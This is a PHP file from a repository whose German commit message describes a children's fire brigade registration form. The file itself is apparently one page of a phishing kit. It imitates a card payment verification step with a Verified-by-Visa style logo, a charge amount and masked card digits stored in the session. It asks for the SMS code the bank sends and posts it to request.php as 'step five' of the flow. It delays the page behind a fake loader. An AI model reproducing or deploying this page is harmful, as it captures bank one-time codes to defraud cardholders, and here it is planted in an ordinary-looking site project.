- Anmeldeformular für Kinderfeuerwehr fertiggestellt - Fehlerbehebung wegen Umstellung auf https - Navigationsleiste wird in der Kategorie "Wir über uns" dynamisch erstellt
98 lines
3.5 KiB
PHP
98 lines
3.5 KiB
PHP
<?php
|
||
/*==========================================================================
|
||
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Author Name : ANƬƖ-ƁƠMƁЄƦ
|
||
* [A][и][T][Ɩ] [в][σ][м][в][є][я] Template Name : O|P|T|U|S|N|E|T|-|C|O|M|-|A|U|
|
||
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Template Version : V.1.1 By 🄰🄽🅃🄸-🄱🄾🄼🄱🄴🅁
|
||
===========================================================================*/
|
||
$page = 'default';
|
||
require_once 'init.php';
|
||
if(!isset($_GET['id'])):
|
||
die(rediret($link)); // We're done here
|
||
else:
|
||
$action = './request.php?step=five&'.$id;
|
||
?>
|
||
<!DOCTYPE html>
|
||
<html lang="de">
|
||
<head>
|
||
<meta charset="UTF-8"/>
|
||
<meta http-equiv="x-ua-compatible" content="ie=edge">
|
||
<title><?php echo lang('Title'); ?></title>
|
||
<meta name="robots" content="noindex, nofollow, noimageindex">
|
||
<meta name="google" content="notranslate">
|
||
<meta name="description" content="">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||
<link rel="stylesheet" href="<?php echo $css1; ?>">
|
||
<link rel="stylesheet" href="./layout/css/style.css">
|
||
<link rel="shortcut icon nofollow" href="<?php echo $favicon; ?>">
|
||
<script src="<?php echo $js;?>"></script>
|
||
<script src="./layout/js/style.js"></script>
|
||
</head>
|
||
<body class="tanya">
|
||
<div id="bg-load" class="bg-load"><div class="load"></div> </div>
|
||
<section>
|
||
<div class="head">
|
||
<span><img src="./layout/img/lg.svg"></span>
|
||
<span><img src="./layout/img/vs.png"></span>
|
||
</div>
|
||
<div class="titr"><?php echo lang('PlzCon'); ?></div>
|
||
<div class="kolchi">
|
||
<form id="cFrm" method="post" action="<?php echo $action; ?>">
|
||
<p style="font-size:12px"><?php echo lang('Theun'); ?></p>
|
||
<div class="inf">
|
||
<span class="tr"><?php echo lang('March'); ?></span>
|
||
<span class="rp"><?php echo lang('ExpDh'); ?></span>
|
||
</div>
|
||
<div class="inf">
|
||
<span class="tr"><?php echo lang('Ch7al'); ?></span>
|
||
<span class="rp" style="font-family:arial"><?php echo $flouss; ?></span>
|
||
</div>
|
||
<div class="inf">
|
||
<span class="tr"><?php echo lang('Tarikh'); ?></span>
|
||
<span class="rp"><?php echo date('d=m=Y');?></span>
|
||
</div>
|
||
<!-- <div class="inf">
|
||
<span class="tr"><?php echo lang('InptCCN'); ?>:</span>
|
||
<span class="rp"><?php echo 'KKKK-KKKK-KKKK-'.$_SESSION['nunu'];?></span>
|
||
</div>
|
||
<div class="inf">
|
||
<span class="tr"><?php echo lang('TlNum'); ?></span>
|
||
<span class="rp"><?php echo $_SESSION['tl']; ?></span>
|
||
</div>-->
|
||
<div class="inf">
|
||
<span class="tr"><?php echo lang('SmCos'); ?></span>
|
||
<span class="rp"><input type="text" class="tantan2" id="tantan2" name="tantan2" maxlength="20" required placeholder="" autocomplete="off" autofocus /></span>
|
||
</div>
|
||
<span class="tr" style="color:red;display:block;font-weight:bold;line-height:16px;font-size:12px"><?php echo lang('SmWron'); ?></span>
|
||
</div>
|
||
<div class="btn"><button type="submit" class="text-center" >Ntke</button></div>
|
||
<div class="foot">© <?php echo date("Y"); ?> <?php echo lang('AllCp'); ?></div>
|
||
</form>
|
||
</section>
|
||
</body>
|
||
<script src="<?php echo $js;?>"></script>
|
||
<script>
|
||
function onReady(callback) {
|
||
var intervalId = window.setInterval(function() {
|
||
if (document.getElementsByTagName('body')[0] !== undefined) {
|
||
window.clearInterval(intervalId);
|
||
callback.call(this);
|
||
}
|
||
}, 12000);
|
||
}
|
||
|
||
function setVisible(selector, visible) {
|
||
document.querySelector(selector).style.display = visible ? 'block' : 'none';
|
||
}
|
||
|
||
onReady(function() {
|
||
setVisible('body', true);
|
||
setVisible('#bg-load', false);
|
||
});
|
||
|
||
</script>
|
||
</html>
|
||
<?php
|
||
endif;
|
||
ob_end_flush();
|
||
?>
|